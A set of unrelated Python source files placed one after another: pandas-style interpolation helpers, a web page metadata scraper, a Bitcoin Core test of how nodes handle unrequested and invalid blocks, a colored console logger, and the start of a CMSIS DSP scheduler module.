xi, yi, axis=axis, bc_type=bc_type, extrapolate=extrapolate
)
return P(x)
def _interpolate_with_limit_area(
values: ArrayLike, method: str, limit: Optional[int], limit_area: Optional[str]
) -> ArrayLike:
"""
Apply interpolation and limit_area logic to values along a to-be-specified axis.
Parameters
----------
values: array-like
Input array.
method: str
Interpolation method. Could be "bfill" or "pad"
limit: int, optional
Index limit on interpolation.
limit_area: str
Limit area for interpolation. Can be "inside" or "outside"
Returns
-------
values: array-like
Interpolated array.
"""
invalid = isna(values)
if not invalid.all():
first = find_valid_index(values, "first")
last = find_valid_index(values, "last")
values = interpolate_2d(
values,
method=method,
limit=limit,
)
if limit_area == "inside":
invalid[first : last + 1] = False
elif limit_area == "outside":
invalid[:first] = invalid[last + 1 :] = False
values[invalid] = np.nan
return values
def interpolate_2d(
values,
method: str = "pad",
axis: Axis = 0,
limit: Optional[int] = None,
limit_area: Optional[str] = None,
):
"""
Perform an actual interpolation of values, values will be make 2-d if
needed fills inplace, returns the result.
Parameters
----------
values: array-like
Input array.
method: str, default "pad"
Interpolation method. Could be "bfill" or "pad"
axis: 0 or 1
Interpolation axis
limit: int, optional
Index limit on interpolation.
limit_area: str, optional
Limit area for interpolation. Can be "inside" or "outside"
Returns
-------
values: array-like
Interpolated array.
"""
if limit_area is not None:
return np.apply_along_axis(
partial(
_interpolate_with_limit_area,
method=method,
limit=limit,
limit_area=limit_area,
),
axis,
values,
)
orig_values = values
transf = (lambda x: x) if axis == 0 else (lambda x: x.T)
# reshape a 1 dim if needed
ndim = values.ndim
if values.ndim == 1:
if axis != 0: # pragma: no cover
raise AssertionError("cannot interpolate on a ndim == 1 with axis != 0")
values = values.reshape(tuple((1,) + values.shape))
method = clean_fill_method(method)
tvalues = transf(values)
if method == "pad":
result = _pad_2d(tvalues, limit=limit)
else:
result = _backfill_2d(tvalues, limit=limit)
result = transf(result)
# reshape back
if ndim == 1:
result = result[0]
if orig_values.dtype.kind in ["m", "M"]:
# convert float back to datetime64/timedelta64
result = result.view(orig_values.dtype)
return result
def _cast_values_for_fillna(values, dtype: DtypeObj, has_mask: bool):
"""
Cast values to a dtype that algos.pad and algos.backfill can handle.
"""
# TODO: for int-dtypes we make a copy, but for everything else this
# alters the values in-place. Is this intentional?
if needs_i8_conversion(dtype):
values = values.view(np.int64)
elif is_integer_dtype(values) and not has_mask:
# NB: this check needs to come after the datetime64 check above
# has_mask check to avoid casting i8 values that have already
# been cast from PeriodDtype
values = ensure_float64(values)
return values
def _fillna_prep(values, mask=None):
# boilerplate for _pad_1d, _backfill_1d, _pad_2d, _backfill_2d
dtype = values.dtype
has_mask = mask is not None
if not has_mask:
# This needs to occur before datetime/timedeltas are cast to int64
mask = isna(values)
values = _cast_values_for_fillna(values, dtype, has_mask)
mask = mask.view(np.uint8)
return values, mask
def _pad_1d(values, limit=None, mask=None):
values, mask = _fillna_prep(values, mask)
algos.pad_inplace(values, mask, limit=limit)
return values
def _backfill_1d(values, limit=None, mask=None):
values, mask = _fillna_prep(values, mask)
algos.backfill_inplace(values, mask, limit=limit)
return values
def _pad_2d(values, limit=None, mask=None):
values, mask = _fillna_prep(values, mask)
if np.all(values.shape):
algos.pad_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
def _backfill_2d(values, limit=None, mask=None):
values, mask = _fillna_prep(values, mask)
if np.all(values.shape):
algos.backfill_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
_fill_methods = {"pad": _pad_1d, "backfill": _backfill_1d}
def get_fill_func(method):
method = clean_fill_method(method)
return _fill_methods[method]
def clean_reindex_fill_method(method):
return clean_fill_method(method, allow_nearest=True)
def _interp_limit(invalid, fw_limit, bw_limit):
"""
Get indexers of values that won't be filled
because they exceed the limits.
Parameters
----------
invalid : boolean ndarray
fw_limit : int or None
forward limit to index
bw_limit : int or None
backward limit to index
Returns
-------
set of indexers
Notes
-----
This is equivalent to the more readable, but slower
.. code-block:: python
def _interp_limit(invalid, fw_limit, bw_limit):
for x in np.where(invalid)[0]:
if invalid[max(0, x - fw_limit):x + bw_limit + 1].all():
yield x
"""
# handle forward first; the backward direction is the same except
# 1. operate on the reversed array
# 2. subtract the returned indices from N - 1
N = len(invalid)
f_idx = set()
b_idx = set()
def inner(invalid, limit):
limit = min(limit, N)
windowed = _rolling_window(invalid, limit + 1).all(1)
idx = set(np.where(windowed)[0] + limit) | set(
np.where((~invalid[: limit + 1]).cumsum() == 0)[0]
)
return idx
if fw_limit is not None:
if fw_limit == 0:
f_idx = set(np.where(invalid)[0])
else:
f_idx = inner(invalid, fw_limit)
if bw_limit is not None:
if bw_limit == 0:
# then we don't even need to care about backwards
# just use forwards
return f_idx
else:
b_idx_inv = list(inner(invalid[::-1], bw_limit))
b_idx = set(N - 1 - np.asarray(b_idx_inv))
if fw_limit == 0:
return b_idx
return f_idx & b_idx
def _rolling_window(a: np.ndarray, window: int):
"""
[True, True, False, True, False], 2 ->
[
[True, True],
[True, False],
[False, True],
[True, False],
]
"""
# https://stackoverflow.com/a/6811241
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
|
|
from bs4 import BeautifulSoup
try:
# For Python 3.0 and later
from urllib.request import urlopen
from urllib.error import URLError
from urllib.error import HTTPError
except ImportError:
# Fall back to Python 2's urllib2
from urllib2 import urlopen
from urllib2 import URLError
from urllib2 import HTTPError
try:
# For Python 3.0 and later
from urllib.parse import urlparse
except ImportError:
# Fall back to Python 2's urlparse
from urlparse import urlparse
try:
from simplejson import loads, dumps
except ImportError:
from json import loads, dumps
TITLE = "title"
NAME = "name"
ITEMPROP = "itemprop"
URL = "url"
SECURE_URL = "secure_url"
HEIGHT = "height"
WIDTH = "width"
HREF_PROPERTY = "href"
META_TAG = "meta"
LINK_TAG = "link"
SOURCE = "source"
IMAGE = "image"
VIDEO = "video"
TYPE = "type"
CONTENT = "content"
PROPERTY = "property"
DESCRIPTION = "description"
KEYWORDS = "keywords"
THEME_COLOR = "theme-color"
OG = "og:"
DEFAULT_HTML_PARSER = "html5lib"
DEFAULT_HTML5_VIDEO_EMBED = "text/html"
INFORMATION_SPACE = "www."
HTTP_PROTOCOL = "http"
HTTP_PROTOCOL_NORMAL = "http://"
SECURE_HTTP_PROTOCOL = "https://"
class SimpleScraper():
"""docstring for SimpleScraper"""
def get_scraped_data(self, link_to_scrap):
try:
result = {}
if link_to_scrap == "":
return {
"error": "Did not get a valid link"
}
try:
if (link_to_scrap.find(INFORMATION_SPACE) == -1 and link_to_scrap.find(HTTP_PROTOCOL) == -1):
link_to_scrap = HTTP_PROTOCOL_NORMAL + INFORMATION_SPACE + link_to_scrap
requestResult = self.__get_request_content(link_to_scrap)
# try secure protocol
request_code = requestResult.getcode()
if request_code < 200 and request_code > 400:
link_to_scrap = SECURE_HTTP_PROTOCOL + INFORMATION_SPACE + link_to_scrap
requestResult = self.__get_request_content(link_to_scrap)
elif (link_to_scrap.find(HTTP_PROTOCOL) == -1):
link_to_scrap = HTTP_PROTOCOL_NORMAL + link_to_scrap
requestResult = self.__get_request_content(link_to_scrap)
# try secure protocol
request_code = requestResult.getcode()
if request_code < 200 and request_code > 400:
link_to_scrap = SECURE_HTTP_PROTOCOL + link_to_scrap
requestResult = self.__get_request_content(link_to_scrap)
else:
requestResult = self.__get_request_content(link_to_scrap)
except Exception as e:
return {
"error": "cannot scrap the provided url",
"reason": e.args[0]
}
request_code = requestResult.getcode()
if request_code >= 200 and request_code <= 400:
page = requestResult.read()
soup = BeautifulSoup(page, DEFAULT_HTML_PARSER)
all_meta_tags = soup.find_all(META_TAG)
all_link_tags = soup.find_all(LINK_TAG, {"rel": "canonical"})
default_title = soup.find(TITLE)
for tag in all_meta_tags:
result = self.__verifyTagName(result, tag)
if TITLE not in result and default_title is not None:
result[TITLE] = default_title.contents[0]
result = self.__verifyTagOpenGraph(result, all_meta_tags)
for tag in all_link_tags:
href = tag.get(HREF_PROPERTY)
if href is not None:
if HTTP_PROTOCOL in href:
result[URL] = href
if URL not in result:
result[URL] = link_to_scrap
result[SOURCE] = urlparse(link_to_scrap).netloc
if IMAGE in result:
if result[IMAGE].find(HTTP_PROTOCOL) == -1:
result[IMAGE] = HTTP_PROTOCOL_NORMAL + result[SOURCE] + result[IMAGE]
return result
except StandardError as e:
return {
"error": "cannot scrap the provided url",
"reason": e.args[0]
}
def __get_request_content(self, link):
try:
return urlopen(link)
except URLError as e:
raise Exception (
"cannot get url content %s" % str(e.reason)
)
except HTTPError as e:
raise Exception (
"cannot make http request %s" % str(e.reason)
)
def __verifyTagName(self, result, tag):
tag_content = tag.get(CONTENT)
tag_to_search = tag.get(NAME)
if tag_to_search is None:
tag_to_search = tag.get(PROPERTY)
if tag_to_search is None:
tag_to_search = tag.get(ITEMPROP)
if tag_to_search is not None and tag_content is not None:
if TITLE == tag_to_search.lower() and TITLE not in result:
result[TITLE] = tag_content
if DESCRIPTION == tag_to_search.lower() and DESCRIPTION not in result:
result[DESCRIPTION] = tag_content
if IMAGE == tag_to_search.lower() and IMAGE not in result:
result[IMAGE] = tag_content
return result
def __verifyTagOpenGraph(self, result, all_tags):
open_graph_objects = {}
searching_iter_name = first_sub_element = last_sub_element = last_element = None
for index, tag in enumerate(all_tags):
tag_content = tag.get(CONTENT)
tag_to_search = tag.get(PROPERTY)
if tag_to_search is None:
tag_to_search = tag.get(NAME)
if tag_to_search is None:
tag_to_search = tag.get(ITEMPROP)
if tag_to_search is not None:
if OG in tag_to_search:
first_iteration = tag_to_search.find(":")
second_iteration = tag_to_search.find(":", first_iteration + 1)
if second_iteration == -1:
tag_og_title = tag_to_search.find(TITLE, first_iteration)
if TITLE not in result and tag_og_title != -1 and tag_to_search is not None:
result[TITLE] = tag_content
tag_og_description = tag_to_search.find(DESCRIPTION, first_iteration)
if DESCRIPTION not in result and tag_og_description != -1 and tag_to_search is not None:
result[DESCRIPTION] = tag_content
tag_og_image = tag_to_search.find(IMAGE, first_iteration)
if IMAGE not in result and tag_og_image != -1 and tag_to_search is not None:
result[IMAGE] = tag_content
if tag_og_title != -1 or tag_og_description != -1 or tag_og_image != -1:
open_graph_objects[tag_to_search[first_iteration + 1:]] = tag_content
else:
iter_name = tag_to_search[first_iteration + 1:second_iteration]
if searching_iter_name is None:
searching_iter_name = iter_name
open_graph_objects[searching_iter_name] = []
if iter_name != searching_iter_name:
searching_iter_name = first_sub_element = last_element = last_sub_element = None
else:
sub_element = tag_to_search[second_iteration + 1:]
if first_sub_element is None:
first_sub_element = sub_element
actual_object = {}
actual_object[first_sub_element] = tag_content
elif first_sub_element == sub_element:
open_graph_objects[searching_iter_name].append(actual_object)
actual_object = {}
actual_object[first_sub_element] = tag_content
last_sub_element = last_element
last_element = None
else:
if last_element == last_sub_element and last_sub_element is not None and last_element is not None:
open_graph_objects[searching_iter_name].append(actual_object)
first_sub_element = sub_element
actual_object = {}
actual_object[first_sub_element] = tag_content
else:
last_element = sub_element
actual_object[sub_element] = tag_content
# check for youtube og video properties for embed iframe
if VIDEO in open_graph_objects:
for elem in open_graph_objects[VIDEO]:
if TYPE in elem:
if elem[TYPE] == DEFAULT_HTML5_VIDEO_EMBED:
if SECURE_URL in elem:
iframe = '<iframe src="%s"' % elem[SECURE_URL]
if HEIGHT in elem:
iframe = iframe + ' height="%s"' % elem[HEIGHT]
if WIDTH in elem:
iframe = iframe + ' width="%s"' % elem[WIDTH]
iframe = iframe + '></iframe>'
result["iframe"] = iframe
elif URL in elem:
iframe = "<iframe src=" + elem[URL]
if HEIGHT in elem:
iframe = iframe + ' height="%s"' % elem[HEIGHT]
if WIDTH in elem:
iframe = iframe + ' width="%s"' % elem[WIDTH]
iframe = iframe + '></iframe>'
result["iframe"] = iframe
return result
|
|
#!/usr/bin/env python3
# Copyright (c) 2015-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test processing of unrequested blocks.
Setup: two nodes, node0+node1, not connected to each other. Node1 will have
nMinimumChainWork set to 0x10, so it won't process low-work unrequested blocks.
We have one P2PInterface connection to node0 called test_node, and one to node1
called min_work_node.
The test:
1. Generate one block on each node, to leave IBD.
2. Mine a new block on each tip, and deliver to each node from node's peer.
The tip should advance for node0, but node1 should skip processing due to
nMinimumChainWork.
Node1 is unused in tests 3-7:
3. Mine a block that forks from the genesis block, and deliver to test_node.
Node0 should not process this block (just accept the header), because it
is unrequested and doesn't have more or equal work to the tip.
4a,b. Send another two blocks that build on the forking block.
Node0 should process the second block but be stuck on the shorter chain,
because it's missing an intermediate block.
4c.Send 288 more blocks on the longer chain (the number of blocks ahead
we currently store).
Node0 should process all but the last block (too far ahead in height).
5. Send a duplicate of the block in #3 to Node0.
Node0 should not process the block because it is unrequested, and stay on
the shorter chain.
6. Send Node0 an inv for the height 3 block produced in #4 above.
Node0 should figure out that Node0 has the missing height 2 block and send a
getdata.
7. Send Node0 the missing block again.
Node0 should process and the tip should advance.
8. Create a fork which is invalid at a height longer than the current chain
(ie to which the node will try to reorg) but which has headers built on top
of the invalid block. Check that we get disconnected if we send more headers
on the chain the node now knows to be invalid.
9. Test Node1 is able to sync when connected to node0 (which should have sufficient
work on its chain).
"""
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase, create_transaction
class AcceptBlockTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [[], ["-minimumchainwork=0x10"]]
def setup_network(self):
# Node0 will be used to test behavior of processing unrequested blocks
# from peers which are not whitelisted, while Node1 will be used for
# the whitelisted case.
# Node2 will be used for non-whitelisted peers to test the interaction
# with nMinimumChainWork.
self.setup_nodes()
def run_test(self):
# Setup the p2p connections and start up the network thread.
# test_node connects to node0 (not whitelisted)
test_node = self.nodes[0].add_p2p_connection(P2PInterface())
# min_work_node connects to node1 (whitelisted)
min_work_node = self.nodes[1].add_p2p_connection(P2PInterface())
network_thread_start()
# Test logic begins here
test_node.wait_for_verack()
min_work_node.wait_for_verack()
# 1. Have nodes mine a block (leave IBD)
[ n.generate(1) for n in self.nodes ]
tips = [ int("0x" + n.getbestblockhash(), 0) for n in self.nodes ]
# 2. Send one block that builds on each tip.
# This should be accepted by node0
blocks_h2 = [] # the height 2 blocks on each node's chain
block_time = int(time.time()) + 1
for i in range(2):
blocks_h2.append(create_block(tips[i], create_coinbase(2), block_time))
blocks_h2[i].solve()
block_time += 1
test_node.send_message(msg_block(blocks_h2[0]))
min_work_node.send_message(msg_block(blocks_h2[1]))
for x in [test_node, min_work_node]:
x.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 2)
assert_equal(self.nodes[1].getblockcount(), 1)
self.log.info("First height 2 block accepted by node0; correctly rejected by node1")
# 3. Send another block that builds on genesis.
block_h1f = create_block(int("0x" + self.nodes[0].getblockhash(0), 0), create_coinbase(1), block_time)
block_time += 1
block_h1f.solve()
test_node.send_message(msg_block(block_h1f))
test_node.sync_with_ping()
tip_entry_found = False
for x in self.nodes[0].getchaintips():
if x['hash'] == block_h1f.hash:
assert_equal(x['status'], "headers-only")
tip_entry_found = True
assert(tip_entry_found)
assert_raises_rpc_error(-1, "Block not found on disk", self.nodes[0].getblock, block_h1f.hash)
# 4. Send another two block that build on the fork.
block_h2f = create_block(block_h1f.sha256, create_coinbase(2), block_time)
block_time += 1
block_h2f.solve()
test_node.send_message(msg_block(block_h2f))
test_node.sync_with_ping()
# Since the earlier block was not processed by node, the new block
# can't be fully validated.
tip_entry_found = False
for x in self.nodes[0].getchaintips():
if x['hash'] == block_h2f.hash:
assert_equal(x['status'], "headers-only")
tip_entry_found = True
assert(tip_entry_found)
# But this block should be accepted by node since it has equal work.
self.nodes[0].getblock(block_h2f.hash)
self.log.info("Second height 2 block accepted, but not reorg'ed to")
# 4b. Now send another block that builds on the forking chain.
block_h3 = create_block(block_h2f.sha256, create_coinbase(3), block_h2f.nTime+1)
block_h3.solve()
test_node.send_message(msg_block(block_h3))
test_node.sync_with_ping()
# Since the earlier block was not processed by node, the new block
# can't be fully validated.
tip_entry_found = False
for x in self.nodes[0].getchaintips():
if x['hash'] == block_h3.hash:
assert_equal(x['status'], "headers-only")
tip_entry_found = True
assert(tip_entry_found)
self.nodes[0].getblock(block_h3.hash)
# But this block should be accepted by node since it has more work.
self.nodes[0].getblock(block_h3.hash)
self.log.info("Unrequested more-work block accepted")
# 4c. Now mine 288 more blocks and deliver; all should be processed but
# the last (height-too-high) on node (as long as it is not missing any headers)
tip = block_h3
all_blocks = []
for i in range(288):
next_block = create_block(tip.sha256, create_coinbase(i + 4), tip.nTime+1)
next_block.solve()
all_blocks.append(next_block)
tip = next_block
# Now send the block at height 5 and check that it wasn't accepted (missing header)
test_node.send_message(msg_block(all_blocks[1]))
test_node.sync_with_ping()
assert_raises_rpc_error(-5, "Block not found", self.nodes[0].getblock, all_blocks[1].hash)
assert_raises_rpc_error(-5, "Block not found", self.nodes[0].getblockheader, all_blocks[1].hash)
# The block at height 5 should be accepted if we provide the missing header, though
headers_message = msg_headers()
headers_message.headers.append(CBlockHeader(all_blocks[0]))
test_node.send_message(headers_message)
test_node.send_message(msg_block(all_blocks[1]))
test_node.sync_with_ping()
self.nodes[0].getblock(all_blocks[1].hash)
# Now send the blocks in all_blocks
for i in range(288):
test_node.send_message(msg_block(all_blocks[i]))
test_node.sync_with_ping()
# Blocks 1-287 should be accepted, block 288 should be ignored because it's too far ahead
for x in all_blocks[:-1]:
self.nodes[0].getblock(x.hash)
assert_raises_rpc_error(-1, "Block not found on disk", self.nodes[0].getblock, all_blocks[-1].hash)
# 5. Test handling of unrequested block on the node that didn't process
# Should still not be processed (even though it has a child that has more
# work).
# The node should have requested the blocks at some point, so
# disconnect/reconnect first
self.nodes[0].disconnect_p2ps()
self.nodes[1].disconnect_p2ps()
network_thread_join()
test_node = self.nodes[0].add_p2p_connection(P2PInterface())
network_thread_start()
test_node.wait_for_verack()
test_node.send_message(msg_block(block_h1f))
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 2)
self.log.info("Unrequested block that would complete more-work chain was ignored")
# 6. Try to get node to request the missing block.
# Poke the node with an inv for block at height 3 and see if that
# triggers a getdata on block 2 (it should if block 2 is missing).
with mininode_lock:
# Clear state so we can check the getdata request
test_node.last_message.pop("getdata", None)
test_node.send_message(msg_inv([CInv(2, block_h3.sha256)]))
test_node.sync_with_ping()
with mininode_lock:
getdata = test_node.last_message["getdata"]
# Check that the getdata includes the right block
assert_equal(getdata.inv[0].hash, block_h1f.sha256)
self.log.info("Inv at tip triggered getdata for unprocessed block")
# 7. Send the missing block for the third time (now it is requested)
test_node.send_message(msg_block(block_h1f))
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 290)
self.nodes[0].getblock(all_blocks[286].hash)
assert_equal(self.nodes[0].getbestblockhash(), all_blocks[286].hash)
assert_raises_rpc_error(-1, "Block not found on disk", self.nodes[0].getblock, all_blocks[287].hash)
self.log.info("Successfully reorged to longer chain from non-whitelisted peer")
# 8. Create a chain which is invalid at a height longer than the
# current chain, but which has more blocks on top of that
block_289f = create_block(all_blocks[284].sha256, create_coinbase(289), all_blocks[284].nTime+1)
block_289f.solve()
block_290f = create_block(block_289f.sha256, create_coinbase(290), block_289f.nTime+1)
block_290f.solve()
block_291 = create_block(block_290f.sha256, create_coinbase(291), block_290f.nTime+1)
# block_291 spends a coinbase below maturity!
block_291.vtx.append(create_transaction(block_290f.vtx[0], 0, b"42", 1))
block_291.hashMerkleRoot = block_291.calc_merkle_root()
block_291.solve()
block_292 = create_block(block_291.sha256, create_coinbase(292), block_291.nTime+1)
block_292.solve()
# Now send all the headers on the chain and enough blocks to trigger reorg
headers_message = msg_headers()
headers_message.headers.append(CBlockHeader(block_289f))
headers_message.headers.append(CBlockHeader(block_290f))
headers_message.headers.append(CBlockHeader(block_291))
headers_message.headers.append(CBlockHeader(block_292))
test_node.send_message(headers_message)
test_node.sync_with_ping()
tip_entry_found = False
for x in self.nodes[0].getchaintips():
if x['hash'] == block_292.hash:
assert_equal(x['status'], "headers-only")
tip_entry_found = True
assert(tip_entry_found)
assert_raises_rpc_error(-1, "Block not found on disk", self.nodes[0].getblock, block_292.hash)
test_node.send_message(msg_block(block_289f))
test_node.send_message(msg_block(block_290f))
test_node.sync_with_ping()
self.nodes[0].getblock(block_289f.hash)
self.nodes[0].getblock(block_290f.hash)
test_node.send_message(msg_block(block_291))
# At this point we've sent an obviously-bogus block, wait for full processing
# without assuming whether we will be disconnected or not
try:
# Only wait a short while so the test doesn't take forever if we do get
# disconnected
test_node.sync_with_ping(timeout=1)
except AssertionError:
test_node.wait_for_disconnect()
self.nodes[0].disconnect_p2ps()
test_node = self.nodes[0].add_p2p_connection(P2PInterface())
network_thread_start()
test_node.wait_for_verack()
# We should have failed reorg and switched back to 290 (but have block 291)
assert_equal(self.nodes[0].getblockcount(), 290)
assert_equal(self.nodes[0].getbestblockhash(), all_blocks[286].hash)
assert_equal(self.nodes[0].getblock(block_291.hash)["confirmations"], -1)
# Now send a new header on the invalid chain, indicating we're forked off, and expect to get disconnected
block_293 = create_block(block_292.sha256, create_coinbase(293), block_292.nTime+1)
block_293.solve()
headers_message = msg_headers()
headers_message.headers.append(CBlockHeader(block_293))
test_node.send_message(headers_message)
test_node.wait_for_disconnect()
# 9. Connect node1 to node0 and ensure it is able to sync
connect_nodes(self.nodes[0], 1)
sync_blocks([self.nodes[0], self.nodes[1]])
self.log.info("Successfully synced nodes 1 and 0")
if __name__ == '__main__':
AcceptBlockTest().main()
|
|
import os
import sys
import logging
__all__ = ['logger']
try:
from colorama import init, Fore, Style
init(autoreset=False)
colors = {
'good' : Fore.GREEN,
'bad' : Fore.RED,
'vgood' : Fore.GREEN + Style.BRIGHT,
'vbad' : Fore.RED + Style.BRIGHT,
'std' : '', # Do not color "standard" text
'warn' : Fore.YELLOW + Style.BRIGHT,
'reset' : Style.RESET_ALL,
}
except ImportError:
colors = {
'good' : '',
'bad' : '',
'vgood' : '',
'vbad' : '',
'std' : '',
'warn' : '',
'reset' : '',
}
def get_console_width():
"""
Return width of available window area. Autodetection works for
Windows and POSIX platforms. Returns 80 for others
Code from http://bitbucket.org/techtonik/python-wget
"""
if os.name == 'nt':
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# get console handle
from ctypes import windll, Structure, byref
try:
from ctypes.wintypes import SHORT, WORD, DWORD
except ImportError:
# workaround for missing types in Python 2.5
from ctypes import (
c_short as SHORT, c_ushort as WORD, c_ulong as DWORD)
console_handle = windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
# CONSOLE_SCREEN_BUFFER_INFO Structure
class COORD(Structure):
_fields_ = [("X", SHORT), ("Y", SHORT)]
class SMALL_RECT(Structure):
_fields_ = [("Left", SHORT), ("Top", SHORT),
("Right", SHORT), ("Bottom", SHORT)]
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
_fields_ = [("dwSize", COORD),
("dwCursorPosition", COORD),
("wAttributes", WORD),
("srWindow", SMALL_RECT),
("dwMaximumWindowSize", DWORD)]
sbi = CONSOLE_SCREEN_BUFFER_INFO()
ret = windll.kernel32.GetConsoleScreenBufferInfo(console_handle, byref(sbi))
if ret == 0:
return 0
return sbi.srWindow.Right+1
elif os.name == 'posix':
from fcntl import ioctl
from termios import TIOCGWINSZ
from array import array
winsize = array("H", [0] * 4)
try:
ioctl(sys.stdout.fileno(), TIOCGWINSZ, winsize)
except IOError:
pass
return (winsize[1], winsize[0])[0]
return 80
class Logger(object):
VERBOSE = logging.DEBUG - 1
DEBUG = logging.DEBUG
INFO = logging.INFO
WARN = logging.WARNING
ERROR = logging.ERROR
FATAL = logging.FATAL
## This attribute is set to True when the user does not want colors
## by __init__.py
_NO_COLORS = False
def __init__(self,level=None):
self.indent = 0
self.level = level or Logger.INFO
self._stack = ['']
self.enabled = True
def disable_colors(self):
self._NO_COLORS = True
for k in colors.keys():
colors[k] = ''
def newline(self):
'''Print a newline character (\n) on Standard Output.'''
sys.stdout.write('\n')
def raise_last(self, exc):
raise exc(self.last_msg)
@property
def last_msg(self):
return self._stack[-1]
def ask(self, message=None, bool=None, choices=None, dont_ask=False):
if bool is not None:
if bool in (True, False) or (isinstance(bool, (list, tuple)) and len(bool) == 1):
if bool == False:
txt = "Cancel"
elif bool == True:
txt = "OK"
else:
txt = bool[0]
self.log(self.info, 'std', "%s, %s..."%(message, txt), addn=False)
if not dont_ask:
raw_input()
return
else:
if dont_ask:
self.log(self.info, 'std', '%s ? Yes'%message)
return True
while True:
self.log(self.info, 'std', "yes: "+bool[0])
self.log(self.info, 'std', "no: "+bool[1])
try:
self.log(self.info, 'std', '%s ? (y/[n]) '%message, addn=False)
ans = raw_input()
except Exception:
continue
# default choice : no
if not ans.strip():
return False
if ans not in 'yYnN':
continue
return ans in 'yY'
if choices:
if isinstance(choices, dict):
_data = choices
choices = choices.keys()
else:
_data = None
self.log(self.info, 'std', message)
for n, choice in enumerate(choices):
self.log(self.info, 'std', "%2d - %s"%(n+1, choice))
while True:
try:
ans = input('Your choice ? ')
except Exception:
self.log(self.info, 'std', "Please enter selected option's number.")
continue
if ans < 0 or ans > len(choices):
continue
break
idx = choices[ans-1]
return (_data[idx] if _data else idx)
def verbose(self, msg, *a, **kw):
self.log(self.VERBOSE, 'std', msg, *a, **kw)
def debug(self, msg, *a, **kw):
self.log(self.DEBUG, 'std', msg, *a, **kw)
def info(self, msg, *a, **kw):
self.log(self.INFO, 'std', msg, *a, **kw)
def success(self, msg, *a, **kw):
self.log(self.INFO, 'good', msg, *a, **kw)
def warn(self, msg, *a, **kw):
self.log(self.WARN, 'warn', msg, *a, **kw)
def error(self, msg, *a, **kw):
self.log(self.ERROR, 'bad', msg, *a, **kw)
exc = kw.get('exc', None)
if exc is not None:
raise exc(self.last_msg)
def fatal(self, msg, *a, **kw):
self.log(self.FATAL, 'vbad', msg, *a, **kw)
exc = kw.get('exc', None)
if exc is not None:
raise exc(self.last_msg)
def exit(self, msg=None, status=1):
if msg != None:
self.log(self.FATAL, 'vbad', msg)
sys.exit(status)
def log(self, level, col, msg, *a, **kw):
'''
This is the base function that logs all messages. This function prints a newline character too,
unless you specify ``addn=False``. When the message starts with a return character (\r) it automatically
cleans the line.
'''
if level >= self.level and self.enabled:
std = sys.stdout
if level >= self.ERROR:
std = sys.stderr
## We can pass to logger.log any object: it must have at least
## a __repr__ or a __str__ method.
msg = str(msg)
if msg.startswith('\r') or self.last_msg.startswith('\r'):
## We have to clear the line in case this message is longer than
## the previous
std.write('\r' + ' ' * get_console_width())
msg = '\r' + ' ' * self.indent + msg.lstrip('\r').format(*a)
else:
try:
msg = ' ' * self.indent + msg.format(*a)
except KeyError:
msg = ' ' * self.indent + msg
col, col_reset = colors[col], colors['reset']
if self._NO_COLORS:
col, col_reset = '', ''
std.write(col + msg + col_reset)
## Automatically adds a newline character
if kw.get('addn', True):
self.newline()
## flush() makes the log immediately readable
std.flush()
self._stack.append(msg)
logger = Logger()
if __name__ == '__main__':
print logger.ask("Beware, you enter a secret place", bool=True)
print logger.ask("Sorry, can't install this package", bool=False)
print logger.ask("Sorry, can't install this package", bool=['Press any key to continue'])
print logger.ask('Proceed', bool=('remove files', 'cancel'))
print logger.ask('Do you want to upgrade', bool=('upgrade version', 'keep working version'))
print logger.ask('Installation method', choices=('Egg based', 'Flat directory'))
print logger.ask('some dict', choices={'choice a': 'a', 'choice b': 'b', 'choice c': 'c'})
|
|
###########################################
# Project: CMSIS DSP Library
# Title: description.py
# Description: Schedule generation
#
# $Date: 29 July 2021
# $Revision: V1.10.0
#
# Target Processor: Cortex-M and Cortex-A cores
# -------------------------------------------------------------------- */
#
# Copyright (C) 2010-2021 ARM Limited or its affiliates. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
############################################
"""Description of the graph"""
import networkx as nx
import numpy as np
from sympy import Matrix
from sympy.core.numbers import ilcm,igcd
import cmsisdsp.sdf.scheduler.graphviz
import cmsisdsp.sdf.scheduler.ccode
import cmsisdsp.sdf.scheduler.pythoncode
from .node import *
from .config import *
from ..types import *
# To debug graph coloring for memory optimization
#import matplotlib.pyplot as plt
class IncompatibleIO(Exception):
pass
class GraphIsNotConnected(Exception):
pass
class NotSchedulableError(Exception):
pass
class DeadlockError(Exception):
pass
class CannotDelayConstantError(Exception):
pass
class FifoBuffer:
"""Buffer used by a FIFO"""
def __init__(self,bufferID,theType,length):
self._length=length
self._theType=theType
self._bufferID=bufferID
class FIFODesc:
"""A FIFO connecting two nodes"""
def __init__(self,fifoid):
# The FIFO is in fact just an array
self.isArray=False
# FIFO length
self.length=0
# FIFO type
self.theType=None
# Buffer used by FIFO
self.buffer=None
# Used for plot in graphviz
self.bufferID=-1
self._fifoID=fifoid
# Source IO
self.src = None
# Dest IO
self.dst = None
# FIFO delay
self.delay=0
# Used for liveliness analysis
# To share buffers between FIFO in memory optimization
# mode, we need to know when a FIFO is in use.
# We compute the maximum extent : so the biggest interval
# and not a disconnected union of intervals
# This could be improved. We could use
# a disjoint union of intervals but they should be mapped
# to the same node in the interference graph
